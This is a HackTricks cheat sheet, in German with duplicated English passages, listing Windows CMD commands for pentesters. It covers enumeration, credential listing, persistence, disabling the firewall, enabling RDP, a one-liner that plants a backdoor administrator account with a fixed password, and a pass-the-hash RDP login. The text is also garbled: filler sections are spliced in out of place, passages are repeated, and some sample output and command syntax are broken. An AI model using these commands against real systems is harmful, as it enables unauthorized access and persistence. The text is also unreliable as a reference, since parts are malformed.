hacktricks/windows-hardening/basic-cmd-for-pentesters.md

# Basic Win CMD for Pentesters

## Grundlegende Win CMD für Pentester

<details>

<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Arbeiten Sie in einem **Cybersicherheitsunternehmen**? Möchten Sie Ihr **Unternehmen in HackTricks bewerben**? Oder möchten Sie Zugriff auf die **neueste Version von PEASS oder HackTricks im PDF-Format** haben? Überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* **Treten Sie der** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie mir auf **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **und das** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **senden**.

</details>

### Systeminformationen

#### Versions- und Patchinformationen

```bash
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info

wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates

hostname

DRIVERQUERY #3rd party driver vulnerable?
```

#### Umgebung

***

#### Basic CMD for Pentesters

#### Grundlegende CMD-Befehle für Pentester

***

#### CMD Basics

#### CMD-Grundlagen

CMD (Command Prompt) is a command-line interpreter for Windows operating systems. It allows users to interact with the operating system by executing commands. As a pentester, having a good understanding of CMD commands is essential for navigating and interacting with the target system.

CMD (Command Prompt) ist ein Befehlszeileninterpreter für Windows-Betriebssysteme. Es ermöglicht Benutzern, mit dem Betriebssystem zu interagieren, indem sie Befehle ausführen. Als Pentester ist es wichtig, ein gutes Verständnis für CMD-Befehle zu haben, um sich im Zielsystem zu bewegen und damit zu interagieren.

***

#### Basic CMD Commands

#### Grundlegende CMD-Befehle

Here are some basic CMD commands that every pentester should know:

Hier sind einige grundlegende CMD-Befehle, die jeder Pentester kennen sollte:

**1. `dir`**

**1. `dir`**

The `dir` command is used to list the files and directories in the current directory.

Der Befehl `dir` wird verwendet, um die Dateien und Verzeichnisse im aktuellen Verzeichnis aufzulisten.

**2. `cd`**

**2. `cd`**

The `cd` command is used to change the current directory.

Der Befehl `cd` wird verwendet, um das aktuelle Verzeichnis zu ändern.

* To change to a specific directory, use `cd <directory_path>`.
* Um zu einem bestimmten Verzeichnis zu wechseln, verwenden Sie `cd <Verzeichnis_pfad>`.
* To go up one directory level, use `cd ..`.
* Um eine Verzeichnisebene nach oben zu gehen, verwenden Sie `cd ..`.
* To go to the root directory, use `cd \` or `cd /`.
* Um zum Stammverzeichnis zu gelangen, verwenden Sie `cd \` oder `cd /`.

**3. `mkdir`**

**3. `mkdir`**

The `mkdir` command is used to create a new directory.

Der Befehl `mkdir` wird verwendet, um ein neues Verzeichnis zu erstellen.

* To create a new directory, use `mkdir <directory_name>`.
* Um ein neues Verzeichnis zu erstellen, verwenden Sie `mkdir <Verzeichnis_name>`.

**4. `del`**

**4. `del`**

The `del` command is used to delete files.

Der Befehl `del` wird verwendet, um Dateien zu löschen.

* To delete a file, use `del <file_name>`.
* Um eine Datei zu löschen, verwenden Sie `del <Datei_name>`.

**5. `rmdir`**

**5. `rmdir`**

The `rmdir` command is used to delete directories.

Der Befehl `rmdir` wird verwendet, um Verzeichnisse zu löschen.

* To delete an empty directory, use `rmdir <directory_name>`.
* Um ein leeres Verzeichnis zu löschen, verwenden Sie `rmdir <Verzeichnis_name>`.
* To delete a directory and its contents, use `rmdir /s <directory_name>`.
* Um ein Verzeichnis und dessen Inhalt zu löschen, verwenden Sie `rmdir /s <Verzeichnis_name>`.

**6. `copy`**

**6. `copy`**

The `copy` command is used to copy files.

Der Befehl `copy` wird verwendet, um Dateien zu kopieren.

* To copy a file, use `copy <source_file> <destination_file>`.
* Um eine Datei zu kopieren, verwenden Sie `copy <Quelldatei> <Zieldatei>`.

**7. `move`**

**7. `move`**

The `move` command is used to move files.

Der Befehl `move` wird verwendet, um Dateien zu verschieben.

* To move a file, use `move <source_file> <destination_file>`.
* Um eine Datei zu verschieben, verwenden Sie `move <Quelldatei> <Zieldatei>`.

**8. `ren`**

**8. `ren`**

The `ren` command is used to rename files.

Der Befehl `ren` wird verwendet, um Dateien umzubenennen.

* To rename a file, use `ren <old_file_name> <new_file_name>`.
* Um eine Datei umzubenennen, verwenden Sie `ren <alter_Dateiname> <neuer_Dateiname>`.

***

#### Conclusion

#### Fazit

These are just a few basic CMD commands that can be useful for pentesters. By mastering these commands, you will be able to navigate and interact with the target system more effectively.

Dies sind nur einige grundlegende CMD-Befehle, die für Pentester nützlich sein können. Indem Sie diese Befehle beherrschen, können Sie sich effektiver im Zielsystem bewegen und damit interagieren.

```bash
set #List all environment variables
```

Einige Umgebungsvariablen, die hervorgehoben werden sollten:

* **COMPUTERNAME**: Name des Computers
* **TEMP/TMP:** Temporärer Ordner
* **USERNAME:** Ihr Benutzername
* **HOMEPATH/USERPROFILE:** Benutzerverzeichnis
* **windir:** C:\Windows
* **OS**: Windows-Betriebssystem
* **LOGONSERVER**: Name des Domänencontrollers
* **USERDNSDOMAIN**: Domänenname für die Verwendung mit DNS
* **USERDOMAIN**: Name der Domäne

```bash
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
```

#### Eingebundene Laufwerke

In Windows können Sie mithilfe des Befehls `mountvol` Informationen über die eingebundenen Laufwerke erhalten. Dieser Befehl zeigt Ihnen die Liste der Laufwerksbuchstaben und der zugehörigen Volumes an.

```plaintext
C:\> mountvol

\\?\Volume{d3e5e6f7-8a9b-cdef-0123-456789abcdef}\
    C:\

\\?\Volume{a1b2c3d4-5e6f-7a8b-9c0d-1e2f3g4h5i6j}\
    D:\
```

Sie können auch den Befehl `wmic logicaldisk` verwenden, um Informationen über die eingebundenen Laufwerke zu erhalten. Dieser Befehl zeigt Ihnen den Laufwerksbuchstaben, den Gerätepfad und den Dateisystemtyp an.

```plaintext
C:\> wmic logicaldisk get caption, deviceid, filesystem

Caption  DeviceID  FileSystem
C:       C:        NTFS
D:       D:        NTFS
```

Diese Informationen können Ihnen bei der Identifizierung von Laufwerken und Volumes auf einem Windows-System helfen.

```bash
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername
```

#### [Defender](authentication-credentials-uac-and-efs/#defender)

Windows Defender ist eine integrierte Antivirensoftware von Microsoft, die auf Windows-Betriebssystemen läuft. Es bietet Schutz vor Viren, Malware und anderen Bedrohungen.

#### Papierkorb

```bash
dir C:\$Recycle.Bin /s /b
```

#### Prozesse, Dienste & Software

**Prozesse**

Um die laufenden Prozesse auf einem Windows-System anzuzeigen, kann der Befehl `tasklist` verwendet werden. Dieser Befehl listet alle Prozesse auf, die auf dem System ausgeführt werden, zusammen mit Informationen wie Prozess-ID, Speichernutzung und Prozessname.

Um einen Prozess zu beenden, kann der Befehl `taskkill` verwendet werden. Dieser Befehl ermöglicht es, einen Prozess anhand seiner Prozess-ID oder seines Namens zu beenden.

**Dienste**

Um die laufenden Dienste auf einem Windows-System anzuzeigen, kann der Befehl `net start` verwendet werden. Dieser Befehl listet alle aktiven Dienste auf, zusammen mit ihrem Status und ihrem Namen.

Um einen Dienst zu starten oder zu stoppen, kann der Befehl `net start` oder `net stop` verwendet werden, gefolgt vom Namen des Dienstes.

**Software**

Um die installierte Software auf einem Windows-System anzuzeigen, kann der Befehl `wmic product get name` verwendet werden. Dieser Befehl listet alle installierten Programme auf, zusammen mit ihren Namen.

Um eine bestimmte Software zu deinstallieren, kann der Befehl `wmic product where name="Softwarename" call uninstall` verwendet werden. Dieser Befehl deinstalliert die angegebene Software.

```bash
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
```

### Domäneninformationen

#### Whois

Die Whois-Abfrage ermöglicht es Ihnen, Informationen über eine bestimmte Domäne abzurufen. Sie können den Registrar, den Registrierungsstatus, das Erstellungsdatum, das Ablaufdatum und andere relevante Informationen über die Domäne erfahren.

```plaintext
whois domain.com
```

#### DNS-Abfrage

Mit einer DNS-Abfrage können Sie Informationen über die DNS-Einträge einer Domäne abrufen. Sie können die IP-Adresse, den Mailserver, den Nameserver und andere DNS-Einträge einer Domäne ermitteln.

```plaintext
nslookup domain.com
```

#### Zone Transfer

Die Zone Transfer-Methode ermöglicht es Ihnen, die gesamte DNS-Zonendatei einer Domäne abzurufen. Dies kann Ihnen helfen, Informationen über die Subdomänen, IP-Adressen und andere DNS-Einträge einer Domäne zu erhalten.

```plaintext
nslookup
> server <DNS-Server-IP>
> ls -d domain.com
```

#### Reverse DNS-Lookup

Mit einem Reverse DNS-Lookup können Sie die Domäne anhand einer IP-Adresse ermitteln. Dies kann nützlich sein, um Informationen über den Eigentümer einer bestimmten IP-Adresse zu erhalten.

```plaintext
nslookup <IP-Adresse>
```

#### Subdomänen-Suche

Die Suche nach Subdomänen ermöglicht es Ihnen, alle Subdomänen einer bestimmten Domäne zu ermitteln. Dies kann Ihnen helfen, potenzielle Angriffsvektoren zu identifizieren.

```plaintext
dnsrecon -d domain.com
```

#### Zonentransfer-Prüfung

Die Zonentransfer-Prüfung ermöglicht es Ihnen, zu überprüfen, ob eine Domäne anfällig für Zonentransfer-Angriffe ist. Ein erfolgreicher Zonentransfer-Angriff kann es einem Angreifer ermöglichen, die gesamte DNS-Zonendatei einer Domäne abzurufen.

```plaintext
dnsrecon -d domain.com -t axfr
```

#### MX-Record-Prüfung

Die MX-Record-Prüfung ermöglicht es Ihnen, den Mailserver einer Domäne zu ermitteln. Dies kann Ihnen helfen, potenzielle Schwachstellen im E-Mail-System einer Domäne zu identifizieren.

```plaintext
dig domain.com MX
```

```bash
# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list	#Displays information about the Domain and Domain Controllers

# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.

# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group

# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers

# Trust relations
nltest /domain_trusts #Mapping of the trust relationships

# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
```

#### Protokolle und Ereignisse

Die Überwachung von Protokollen und Ereignissen ist ein wichtiger Aspekt der Sicherheit und ermöglicht es Ihnen, potenzielle Angriffe oder Sicherheitsverletzungen zu erkennen. In Windows gibt es verschiedene Arten von Protokollen und Ereignissen, die überwacht werden können, um die Sicherheit Ihres Systems zu verbessern.

**Windows-Ereignisprotokolle**

Windows speichert verschiedene Arten von Ereignissen in Protokolldateien, die als Windows-Ereignisprotokolle bezeichnet werden. Diese Protokolle enthalten Informationen über Systemereignisse, Anwendungsereignisse, Sicherheitsereignisse und vieles mehr. Sie können auf diese Protokolle zugreifen, um nach verdächtigen Aktivitäten zu suchen und potenzielle Sicherheitsprobleme zu identifizieren.

**Ereignisanzeige**

Die Ereignisanzeige ist ein Windows-Tool, mit dem Sie auf die Ereignisprotokolle zugreifen und diese anzeigen können. Sie können die Ereignisanzeige öffnen, indem Sie "eventvwr.msc" in die Befehlszeile eingeben. In der Ereignisanzeige können Sie die verschiedenen Ereignisprotokolle durchsuchen, nach bestimmten Ereignissen filtern und detaillierte Informationen zu einzelnen Ereignissen anzeigen.

**Überwachung von Ereignissen**

Die Überwachung von Ereignissen kann Ihnen helfen, verdächtige Aktivitäten zu erkennen und potenzielle Sicherheitsverletzungen zu identifizieren. Sie können Ereignisprotokolle überwachen, um nach bestimmten Ereignissen oder Aktivitäten zu suchen, die auf eine Kompromittierung hinweisen könnten. Dazu gehören beispielsweise fehlgeschlagene Anmeldeversuche, ungewöhnliche Netzwerkaktivitäten oder verdächtige Dateiänderungen.

**Ereignisabonnements**

In Windows können Sie Ereignisabonnements erstellen, um bestimmte Ereignisse zu überwachen und Benachrichtigungen zu erhalten, wenn diese Ereignisse auftreten. Sie können beispielsweise ein Ereignisabonnement erstellen, um benachrichtigt zu werden, wenn ein fehlgeschlagener Anmeldeversuch erkannt wird. Dies kann Ihnen helfen, schnell auf potenzielle Sicherheitsverletzungen zu reagieren und geeignete Maßnahmen zu ergreifen.

**Protokollierungseinstellungen**

Es ist wichtig, die Protokollierungseinstellungen in Windows zu überprüfen und anzupassen, um sicherzustellen, dass relevante Ereignisse erfasst werden. Sie können die Protokollierungseinstellungen über die Gruppenrichtlinienverwaltung oder die Registrierung ändern. Stellen Sie sicher, dass die Protokollierung aktiviert ist und dass die erforderlichen Ereignisse erfasst werden, um die Sicherheit Ihres Systems zu verbessern.

**Protokollanalyse**

Die Analyse von Protokollen kann Ihnen helfen, verdächtige Aktivitäten zu erkennen und potenzielle Sicherheitsverletzungen zu identifizieren. Sie können Protokolle auf Anomalien, ungewöhnliche Muster oder verdächtige Ereignisse überprüfen. Es gibt verschiedene Tools und Techniken, die Ihnen bei der Analyse von Protokollen helfen können, einschließlich SIEM (Security Information and Event Management) und Log-Analyse-Tools.

**Zusammenfassung**

Die Überwachung von Protokollen und Ereignissen ist ein wichtiger Bestandteil der Sicherheit in Windows. Durch die Überwachung von Ereignisprotokollen, die Erstellung von Ereignisabonnements und die Analyse von Protokollen können Sie verdächtige Aktivitäten erkennen und potenzielle Sicherheitsverletzungen identifizieren. Stellen Sie sicher, dass die Protokollierungseinstellungen angemessen konfiguriert sind, um relevante Ereignisse zu erfassen und die Sicherheit Ihres Systems zu verbessern.

```bash
#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
```

**List all users**

```plaintext
net user
```

**Get detailed information about a specific user**

```plaintext
net user <username>
```

**Create a new user**

```plaintext
net user <username> <password> /add
```

**Delete a user**

```plaintext
net user <username> /delete
```

**Change a user's password**

```plaintext
net user <username> <new_password>
```

#### Groups

**List all groups**

```plaintext
net localgroup
```

**Get detailed information about a specific group**

```plaintext
net localgroup <groupname>
```

**Add a user to a group**

```plaintext
net localgroup <groupname> <username> /add
```

**Remove a user from a group**

```plaintext
net localgroup <groupname> <username> /delete
```

**Create a new group**

```plaintext
net localgroup <groupname> /add
```

**Delete a group**

```plaintext
net localgroup <groupname> /delete
```

**Add a group to another group**

```plaintext
net localgroup <groupname> /add <other_groupname>
```

**Remove a group from another group**

```plaintext
net localgroup <groupname> /delete <other_groupname>
```

```bash
#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges

# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user

# Other users looged
qwinsta #Anyone else logged in?

#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
```

#### Gruppen

Gruppen sind eine Möglichkeit, Benutzer in Windows zu organisieren und ihnen bestimmte Berechtigungen zuzuweisen. Hier sind einige grundlegende Befehle, um mit Gruppen in der Befehlszeile umzugehen:

**Gruppen anzeigen**

Um alle Gruppen auf einem Windows-System anzuzeigen, verwenden Sie den Befehl `net localgroup`:

```plaintext
net localgroup
```

**Gruppenmitglieder anzeigen**

Um die Mitglieder einer bestimmten Gruppe anzuzeigen, verwenden Sie den Befehl `net localgroup` gefolgt vom Gruppennamen:

```plaintext
net localgroup <Gruppenname>
```

**Benutzer zu einer Gruppe hinzufügen**

Um einen Benutzer zu einer Gruppe hinzuzufügen, verwenden Sie den Befehl `net localgroup` gefolgt von dem Gruppennamen und dem Benutzernamen:

```plaintext
net localgroup <Gruppenname> <Benutzername> /add
```

**Benutzer aus einer Gruppe entfernen**

Um einen Benutzer aus einer Gruppe zu entfernen, verwenden Sie den Befehl `net localgroup` gefolgt von dem Gruppennamen und dem Benutzernamen:

```plaintext
net localgroup <Gruppenname> <Benutzername> /delete
```

**Neue Gruppe erstellen**

Um eine neue Gruppe zu erstellen, verwenden Sie den Befehl `net localgroup` gefolgt von dem Gruppennamen und der Option `/add`:

```plaintext
net localgroup <Gruppenname> /add
```

**Gruppe löschen**

Um eine Gruppe zu löschen, verwenden Sie den Befehl `net localgroup` gefolgt von dem Gruppennamen und der Option `/delete`:

```plaintext
net localgroup <Gruppenname> /delete
```

Diese Befehle helfen Ihnen dabei, Gruppen in Windows zu verwalten und die Sicherheit Ihres Systems zu verbessern.

```bash
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators

#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belongs to the group
```

To list active sessions in Windows, you can use the `query session` command. This command will display information about each active session, including the session ID, username, and session state.

```plaintext
C:\> query session
```

This will output a table with the session details, such as:

```plaintext
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
 console           Administrator             1  Active
                   user1                      2  Disc
                   user2                      3  Disc
```

#### Sitzungen auflisten

Um aktive Sitzungen in Windows aufzulisten, können Sie den Befehl `query session` verwenden. Dieser Befehl zeigt Informationen zu jeder aktiven Sitzung an, einschließlich der Sitzungs-ID, des Benutzernamens und des Sitzungszustands.

```plaintext
C:\> query session
```

Dies gibt eine Tabelle mit den Sitzungsdetails aus, wie zum Beispiel:

```plaintext
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
 console           Administrator             1  Active
                   user1                      2  Disc
                   user2                      3  Disc
```

```
qwinsta
klist sessions
```

#### Passwortrichtlinie

Eine Passwortrichtlinie ist eine Reihe von Regeln und Anforderungen, die festlegen, wie Passwörter erstellt und verwaltet werden sollten. Eine starke Passwortrichtlinie ist entscheidend für die Sicherheit eines Systems, da schwache Passwörter ein leichtes Ziel für Angreifer darstellen können.

Hier sind einige bewährte Praktiken für eine effektive Passwortrichtlinie:

* **Passwortlänge**: Legen Sie eine Mindestlänge für Passwörter fest, um sicherzustellen, dass sie ausreichend komplex sind. Eine Länge von mindestens 8 Zeichen wird empfohlen.
* **Komplexität**: Verlangen Sie, dass Passwörter eine Kombination aus Groß- und Kleinbuchstaben, Zahlen und Sonderzeichen enthalten, um die Sicherheit zu erhöhen.
* **Passwortablauf**: Legen Sie eine maximale Gültigkeitsdauer für Passwörter fest und erzwingen Sie deren Änderung in regelmäßigen Abständen. Dies minimiert das Risiko von Passwortlecks und stellt sicher, dass Benutzer regelmäßig neue Passwörter verwenden.
* **Passworthistorie**: Verbieten Sie die Verwendung von Passwörtern, die bereits verwendet wurden, um zu verhindern, dass Benutzer alte Passwörter wiederverwenden.
* **Sperrzeit**: Legen Sie eine Sperrzeit fest, nach der ein Konto gesperrt wird, wenn eine bestimmte Anzahl von fehlgeschlagenen Anmeldeversuchen erfolgt. Dies schützt vor Brute-Force-Angriffen.
* **Benachrichtigungen**: Benachrichtigen Sie Benutzer rechtzeitig über bevorstehende Passwortänderungen und informieren Sie sie über bewährte Praktiken zur Erstellung sicherer Passwörter.

Eine gut durchdachte Passwortrichtlinie ist ein wichtiger Schritt zur Stärkung der Sicherheit eines Systems und zur Verhinderung von unbefugtem Zugriff. Es ist wichtig, dass Benutzer sich der Richtlinie bewusst sind und diese befolgen, um die Wirksamkeit zu gewährleisten.

```
net accounts
```

#### Anmeldeinformationen

Credentials are the usernames and passwords that are used to authenticate and authorize access to various systems and services. In the context of hacking, obtaining credentials is often a crucial step in gaining unauthorized access to a target system.

Anmeldeinformationen sind Benutzernamen und Passwörter, die zur Authentifizierung und Autorisierung des Zugriffs auf verschiedene Systeme und Dienste verwendet werden. Im Zusammenhang mit Hacking ist das Erlangen von Anmeldeinformationen oft ein entscheidender Schritt, um unbefugten Zugriff auf ein Zielsystem zu erlangen.

```bash
cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
```

#### Persistenz mit Benutzern

In diesem Abschnitt werden verschiedene Techniken zur Erreichung von Persistenz mit Benutzern auf einem Windows-System beschrieben. Diese Techniken ermöglichen es einem Angreifer, den Zugriff auf das System aufrechtzuerhalten, selbst nach einem Neustart oder einer Abmeldung des Benutzers.

**1. Benutzerprofilordner**

Ein häufig genutzter Ansatz besteht darin, eine bösartige Datei oder einen bösartigen Skript im Benutzerprofilordner des Zielsystems abzulegen. Dieser Ordner enthält wichtige Konfigurationsdateien und Einstellungen für den Benutzer. Durch das Platzieren einer bösartigen Datei in diesem Ordner kann der Angreifer sicherstellen, dass sie bei jedem Anmelden des Benutzers automatisch ausgeführt wird.

**2. Registrierungseinträge**

Die Windows-Registrierung ist eine zentrale Datenbank, die wichtige Informationen und Einstellungen für das Betriebssystem enthält. Ein Angreifer kann bösartige Registrierungseinträge erstellen, um eine Persistenz mit Benutzern zu erreichen. Diese Einträge können so konfiguriert werden, dass sie bei jedem Systemstart oder bei der Anmeldung eines bestimmten Benutzers automatisch ausgeführt werden.

**3. Geplante Aufgaben**

Die Windows-Aufgabenplanung ermöglicht es Benutzern, Aufgaben zu planen, die zu einem bestimmten Zeitpunkt oder bei bestimmten Ereignissen ausgeführt werden sollen. Ein Angreifer kann eine bösartige geplante Aufgabe erstellen, um eine Persistenz mit Benutzern zu erreichen. Diese Aufgabe kann so konfiguriert werden, dass sie regelmäßig ausgeführt wird, um den Zugriff auf das System aufrechtzuerhalten.

**4. Dienste**

Windows-Dienste sind Programme, die im Hintergrund ausgeführt werden und bestimmte Funktionen bereitstellen. Ein Angreifer kann einen bösartigen Dienst erstellen, um eine Persistenz mit Benutzern zu erreichen. Dieser Dienst kann so konfiguriert werden, dass er bei jedem Systemstart automatisch gestartet wird und somit den Zugriff auf das System aufrechterhält.

**5. Anmeldeobjekte**

Windows bietet verschiedene Anmeldeobjekte, die beim Anmelden eines Benutzers automatisch ausgeführt werden. Ein Angreifer kann eine bösartige Datei oder ein bösartiges Skript in einem dieser Anmeldeobjekte platzieren, um eine Persistenz mit Benutzern zu erreichen. Dadurch wird sichergestellt, dass die bösartige Datei bei jedem Anmelden des Benutzers automatisch ausgeführt wird.

Es ist wichtig zu beachten, dass diese Techniken von Angreifern missbraucht werden können, um unbefugten Zugriff auf Systeme zu erlangen. Es ist daher entscheidend, dass Benutzer und Administratoren geeignete Sicherheitsmaßnahmen ergreifen, um solche Angriffe zu verhindern.

```bash
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName  /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
```

### Netzwerk

#### Schnittstellen, Routen, Ports, Hosts und DNS-Cache

```bash
ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
```

#### Firewall

Eine Firewall ist eine Sicherheitsvorrichtung, die den Datenverkehr zwischen einem internen Netzwerk und einem externen Netzwerk überwacht und kontrolliert. Sie dient dazu, unerwünschten Datenverkehr zu blockieren und das interne Netzwerk vor potenziellen Angriffen zu schützen.

Firewalls können auf verschiedenen Ebenen arbeiten, einschließlich der Netzwerk-, Transport- und Anwendungsebene. Sie können den Datenverkehr basierend auf verschiedenen Kriterien wie IP-Adresse, Portnummer und Protokolltyp filtern.

Es gibt verschiedene Arten von Firewalls, darunter Netzwerk-Firewalls, Host-Firewalls und persönliche Firewalls. Netzwerk-Firewalls werden normalerweise auf Netzwerkgeräten wie Routern und Firewalls installiert und schützen das gesamte Netzwerk. Host-Firewalls werden auf einzelnen Computern oder Servern installiert und schützen diese vor Angriffen. Persönliche Firewalls sind Softwareanwendungen, die auf einzelnen Computern installiert sind und den Datenverkehr für diesen spezifischen Computer überwachen und kontrollieren.

Es ist wichtig, eine Firewall richtig zu konfigurieren und regelmäßig zu aktualisieren, um sicherzustellen, dass sie effektiv vor Angriffen schützt. Eine schlecht konfigurierte Firewall kann Sicherheitslücken aufweisen und Angreifern den Zugriff auf das interne Netzwerk ermöglichen.

Firewalls sind ein wichtiger Bestandteil der Netzwerksicherheit und sollten in jedem Netzwerk implementiert werden, um die Sicherheit zu erhöhen und potenzielle Angriffe zu verhindern.

```bash
netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles

NetSh Advfirewall set allprofiles state off  #Turn Off
NetSh Advfirewall set allprofiles state on  #Trun On
netsh firewall set opmode disable #Turn Off

#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed

#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

#Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
```

#### Freigaben

**Überblick**

Freigaben sind Verzeichnisse oder Dateien, die von einem Windows-Computer für andere Benutzer oder Geräte im Netzwerk zugänglich gemacht werden. In diesem Abschnitt werden einige grundlegende Befehle vorgestellt, die Pentester verwenden können, um Informationen über Freigaben zu sammeln und auf diese zuzugreifen.

**Befehle**

* `net share`: Zeigt eine Liste der Freigaben auf dem aktuellen System an.
* `net view \\[IP]`: Zeigt eine Liste der Freigaben auf einem Remote-System an.
* `net use \\[IP]\[Freigabe] [Passwort] /user:[Benutzername]`: Verbindet sich mit einer Freigabe auf einem Remote-System.
* `net use`: Zeigt eine Liste der aktuell verbundenen Freigaben an.
* `net use [Laufwerksbuchstabe]: /delete`: Trennt eine Verbindung zu einer Freigabe.

**Beispiele**

